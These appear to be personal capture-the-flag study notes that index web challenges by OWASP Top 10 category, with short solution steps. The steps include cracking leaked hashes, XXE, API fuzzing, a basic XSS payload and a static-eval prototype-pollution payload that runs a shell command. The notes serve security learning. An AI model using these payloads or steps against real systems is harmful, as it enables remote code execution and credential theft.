OWASP Top 10

Index

looking_glass

[!bug] Command Injection

sanitize

[!bug] SQL Injection

baby_auth

[!bug] Broken Authentication

baby_nginxatsu

[!bug] Sensitive data exposure

  • leads to leakage of MD5 hashed admin password
  1. navigate to /storage
  2. download and unzip backup file
  3. browse via sqlite3 or sqlitebrowser
  4. crack hashes on crackstation or john

@todo - crack hashes with john and hashcat

baby_WAFfles_order

[!bug] XXE

  • change Content-Type to application/xml
  • convert json request body to xml
  • find payloads -> get /flag

baby_todo_or_not_todo

[!bug] Application logic bug leads to leakage of sensitive info

  • or use ffuf to fuzz api endpoints (include ?secret= and -H "Cookie: <cookie>")
  • in html body we found - "// don't use getstatus('all') until we get the verify_integrity() patched"
  • url contains ?secret=<secret>
  • requesting /api/list/all with our secret we find our flag

  • rewritten htb solver

baby_BoneChewerCon

full_stack_conf

[!bug] XSS

  • From description: "But be very careful with the stay up to date form, we don't sanitize anything and the admin logs in and checks the emails regularly, don't try anything funny!! 😅"
  • From site: "But be very careful with the stay up to date form, we don't sanitize anything and the admin logs in and checks the emails regularly, don't try anything funny!! 😅"

[!hint] XSS Payload: <script>alert("XSS")</script>

baby_website_rick

[!bug] Insecure Deserialization - RCE

baby_breaking_grad

[!bug] Code Execution Vulnerability - Prototype Pollution RCE

  • exploiting the static-eval library
  • sandbox bypass

Whitebox approach

[!hint] Payload from braincoke write-up

{
    "name": "smth",
    "formula": "(function myTag(y){return ''[!y?'__proto__':'constructor'][y]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\"cat flag\"))')()"
}

or use htb solver